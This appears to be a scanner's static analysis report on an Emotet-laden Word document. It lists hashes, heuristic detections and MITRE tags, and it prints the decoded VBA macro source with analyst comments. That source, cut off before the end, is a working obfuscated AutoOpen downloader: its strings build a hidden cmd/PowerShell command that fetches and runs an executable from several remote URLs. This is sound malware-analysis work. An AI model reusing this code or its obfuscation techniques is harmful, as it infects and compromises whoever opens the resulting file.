Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 30a28c8127437566…

MALICIOUS

Office (OLE)

71.8 KB Created: 2018-09-13 22:04:00 Authoring application: Microsoft Office Word First seen: 2019-06-27
MD5: a61e59d997a29ec013d393b7a719dbda SHA-1: fa2229ef95b9e45e881ac27004c2a90f6c6e0947 SHA-256: 30a28c8127437566f7452c9b8f1350e61a7d881c611b99399dcc324370a71b3b
142 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The file contains a critical ClamAV detection for Emotet, along with medium-severity heuristics indicating the presence of legacy and standard VBA macros, including an AutoOpen macro. The AutoOpen subroutine in the VBA script attempts to run an obfuscated command line through 'cmd.exe'; that command line appears to be designed to download and execute a second-stage payload. The ClamAV signature specifically names Emotet, supporting this family attribution.

Heuristics 5

  • ClamAV: Doc.Downloader.Emotet-6884106-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6884106-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface; on its own it is not a downloader or parser-CVE attribution.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4231 bytes
SHA-256: 4e93c9b3d50dfbffa52958a20c2f0bb26984cf420b07a03da68a78c4d56038dc
Preview script
First 1,000 lines of the extracted script
' Module attributes written by the VBA exporter (olevba decoded source).
' VB_Name is the module's name; VB_Base = "1Normal.ThisDocument" together
' with VB_PredeclaredId = True is what the ThisDocument document module
' normally carries, which suggests AutoOpen below lives in the document
' module itself rather than in a separate standard module — presumably;
' confirm against the OLE stream listing.
Attribute VB_Name = "SszqwTK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' AutoOpen: Word runs this procedure automatically when the document is
' opened (the OLE_VBA_AUTOOPEN finding / T1204.002 above). The routine
' does one thing — build a string from three helper functions and pass it
' to Shell; everything else in it is padding.
Sub AutoOpen()
' "On Error Resume Next" spread over four physical lines with line
' continuations (_) so the keyword sequence never appears on one line;
' it silences every runtime error for the rest of the Sub. Presumably
' done to hinder simple pattern matching — confirm against other modules.
On _
Error _
Resume _
Next
' The arrays below are filled with numeric constants and are never read
' again anywhere in this Sub: filler/dead code around the single live
' statement (the Shell call further down).
   Dim FFQUZc()
ReDim FFQUZc(5)
FFQUZc(0) = 5
FFQUZc(1) = 1
FFQUZc(2) = 22
FFQUZc(3) = 1220
FFQUZc(4) = 41

   Dim mSHYrf()
ReDim mSHYrf(5)
mSHYrf(0) = 733
mSHYrf(1) = 75
mSHYrf(2) = 67415281
mSHYrf(3) = 25
mSHYrf(4) = 1579

   Dim fskVp()
ReDim fskVp(2)
fskVp(0) = 1244
fskVp(1) = 591

   Dim jTroY()
ReDim jTroY(5)
jTroY(0) = 13
jTroY(1) = 27
jTroY(2) = 8128
jTroY(3) = 119003862
jTroY(4) = 4349

   Dim MPaKZ()
ReDim MPaKZ(4)
MPaKZ(0) = 379641608
MPaKZ(1) = 46911394
MPaKZ(2) = 38
MPaKZ(3) = 654

' The only live statement. The three helper functions each return a
' fragment of text; their concatenation is handed to Shell. rovZMtIkZJb
' is defined further down in the extracted source and assembles a
' caret-escaped "cmd /V:/C" command line whose real content is stored
' reversed and re-assembled at run time by a "for /L" countdown loop;
' YrOoGfHklwYKir and NjDswvUBmiEEzR are outside the visible part of the
' listing. Format(0) evaluates to "0", i.e. WindowStyle vbHide, so the
' spawned process gets no visible window. The "@" type-declaration
' character glued onto Shell is unusual and presumably there to break
' naive signature matches — verify it compiles as intended.
Shell@ rovZMtIkZJb + YrOoGfHklwYKir + NjDswvUBmiEEzR, Format(0)
' More unused filler arrays, placed after the Shell call.
   Dim YXIwWR()
ReDim YXIwWR(5)
YXIwWR(0) = 30
YXIwWR(1) = 95
YXIwWR(2) = 5
YXIwWR(3) = 302634732
YXIwWR(4) = 7

   Dim NivzZ()
ReDim NivzZ(2)
NivzZ(0) = 90
NivzZ(1) = 1

End Sub



' Second module in the extracted source. It holds rovZMtIkZJb, the first
' of the three helper functions AutoOpen concatenates into its Shell
' argument; the function body that follows is truncated in this preview.
Attribute VB_Name = "VHbwtETzcXNCY"
Function rovZMtIkZJb()

On _
Error _
Resume _
Next
Dim FqHTRA()
ReDim FqHTRA(5)
FqHTRA(0) = 49
FqHTRA(1) = 4997
FqHTRA(2) = 96534893
FqHTRA(3) = 86
FqHTRA(4) = 8583

   Dim tsTJGE()
ReDim tsTJGE(4)
tsTJGE(0) = 556
tsTJGE(1) = 4
tsTJGE(2) = 1
tsTJGE(3) = 388606671

   Dim wNpfu()
ReDim wNpfu(4)
wNpfu(0) = 68
wNpfu(1) = 3087
wNpfu(2) = 3
wNpfu(3) = 4

baBkpb = Format(Chr(14 + 7 + 8 + 8 + 62)) + "md /V:/" + Format(Chr(10 + 5 + 5 + 5 + 42)) + Format(Chr(4 + 2 + 2 + 2 + 24)) + "s" + "^e^t ^y^k=^  ^  " + "           ^ ^ }^}{h" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "ta" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "^" + "}^;^k^a^er^b;^i^b^Q^$ m" + "etI-^e^k^ovn^I;" + ")i^b^Q$ ,rvv$(e^li^F" + "^d^ao^lnw^o^D^.M^w^H${^yr^" + "t^{)uB^w$ n^i^ rvv^$(^h" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "ae" + "r^o^f;^'ex^e.'+RVE"
Dim mwcjF()
ReDim mwcjF(5)
mwcjF(0) = 9067
mwcjF(1) = 23657316
mwcjF(2) = 6
mwcjF(3) = 6
mwcjF(4) = 21

   Dim zEIMY()
ReDim zEIMY(2)
zEIMY(0) = 6279
zEIMY(1) = 471557024

   Dim dvpCY()
ReDim dvpCY(3)
dvpCY(0) = 192
dvpCY(1) = 351
dvpCY(2) = 334177786

mwOfuLCt = "$^+'^\'" + "^+" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "il^bup^:vne$=i^b^Q^$;^'^5" + "9^6^' = RV^E^$^;)^'@'(ti^" + "l^p^S^.^" + "'s1^tGSL^7r" + "^9j/^ti^" + ".^iz^i^t^a^m^a//^:^p^tth@^m^AW" + "^QuG^f/" + "mo" + Format(Chr(14 + 7 + 8 + 8 + 62)) + ".n^" + "wote^pa" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "^gnir^o^olf^et" + "^an^im^a^l//:^pt^t^h@hQu4U^k" + "^OQ/^e^d^." + "^ten^e^s^o^o^g//:^ptt^h"
Dim iCqkYf()
ReDim iCqkYf(2)
iCqkYf(0) = 548
iCqkYf(1) = 4

   Dim Wzpfz()
ReDim Wzpfz(5)
Wzpfz(0) = 80
Wzpfz(1) = 167892834
Wzpfz(2) = 9035
Wzpfz(3) = 8
Wzpfz(4) = 2

   Dim YhODj()
ReDim YhODj(5)
YhODj(0) = 797
YhODj(1) = 9
YhODj(2) = 798
YhODj(3) = 86622295
YhODj(4) = 2949

kNSOMtOjXo = "@^EqFQb^ZYr^w^Y/^mo" + Format(Chr(14 + 7 + 8 + 8 + 62)) + ".s^m^ets^ys^-^fe^i" + "l^e^b//^:^" + "p^tth@v^mdup^mLR^SF/o^fn^i^" + ".^gno^s" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "^u^htnei^k." + "zra^ts^p" + "o^pk//" + "^:^p^tt^h'^=u^B^w$^;tnei^l" + Format(Chr(10 + 5 + 5 + 5 + 42)) + "^be" + "^W^.teN^" + " ^t" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "^ej^b^o-^wen=^MwH" + "^$^ l^l^e^h^s" + "re^w^o^p&&^f^o" + "r /^L %^0 ^i"
Dim hTToi()
ReDim hTToi(3)
hTToi(0) = 228
hTToi(1) = 801
hTToi(2) = 8569

   Dim tMopO()
ReDim tMopO(4)
tMopO(0) = 52
tMopO(1) = 101626129
tMopO(2) = 223
tMopO(3) = 462115113

FjOdQTYubXn = "n (3^9^3^,-1^,0)^do ^set ^" + "s^Q" + Format(Chr(10 + 5 + 5 + 5 + 42)) + "P=!^s^Q" + Format(Chr(10 + 5 + 5 + 5 + 42)) + "P!!" + "^y^k:~%^0" + ",1!&&^i^f %^0 ^ls^s ^1 " + Format(Chr(14 + 7 + 8 + 8 + 62)) + "a" + "^l^l %^s^Q" + Format(Chr(10 + 5 + 5 + 5 + 42)) + "P:^*^sQ" + Format(Chr(10 + 5 + 5 + 5 + 42)) + "^P" + "^!^=%" + Format(Chr(4 + 2 + 2 + 2 + 24)) + ""
rovZMtIkZJb = baBkpb + mwOfuLCt + kNSOMtOjXo + FjOdQTYubXn
   Dim XojQV()
ReDim XojQV(3)
XojQV(0) = 35055573
XojQV(
... (truncated)